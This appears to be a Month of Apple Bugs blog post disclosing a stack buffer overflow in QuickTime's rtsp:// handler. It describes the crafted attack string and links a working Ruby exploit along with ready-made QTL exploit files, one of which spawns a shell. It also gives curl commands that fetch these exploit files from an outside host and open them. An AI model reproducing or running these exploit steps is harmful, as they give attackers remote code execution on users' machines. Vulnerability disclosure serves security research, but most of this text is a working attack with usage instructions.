A vulnerability exists in the handling of the rtsp:// URL handler. By supplying a specially crafted string (rtsp:// [random] + colon + [299 bytes padding + payload]), an attacker could overflow a stack-based buffer, using either HTML, Javascript or a QTL file as attack vector, leading to an exploitable remote arbitrary code execution condition.For further information:
- Details, debugging information and exploitation notes.
- Working exploit: MOAB-01-01-2007.rb
Update: An example QTL file exploiting this issue (pwnage.qtl) is available (it will say 'happy new year' via
/usr/bin/say
, and expects the command string to be located at 0x17a053c
, tested on Mac OS X 10.4.8 8L2127, x86 architecture). If it doesn't work on your system, use the exploit to generate another QTL with your own options or the shell spawn variant (pwnage-shell.qtl, 100% reliable for a current up-to-date x86-based OS X system). Usage:
$ curl http://projects.info-pull.com/moab/bug-files/pwnage.qtl -o pwnage.qtl
(...)
$ open pwnage.qtl
$ curl http://projects.info-pull.com/moab/bug-files/pwnage-shell.qtl -o pwnage-shell.qtl
(...)
$ open pwnage-shell.qtl
No comments:
Post a Comment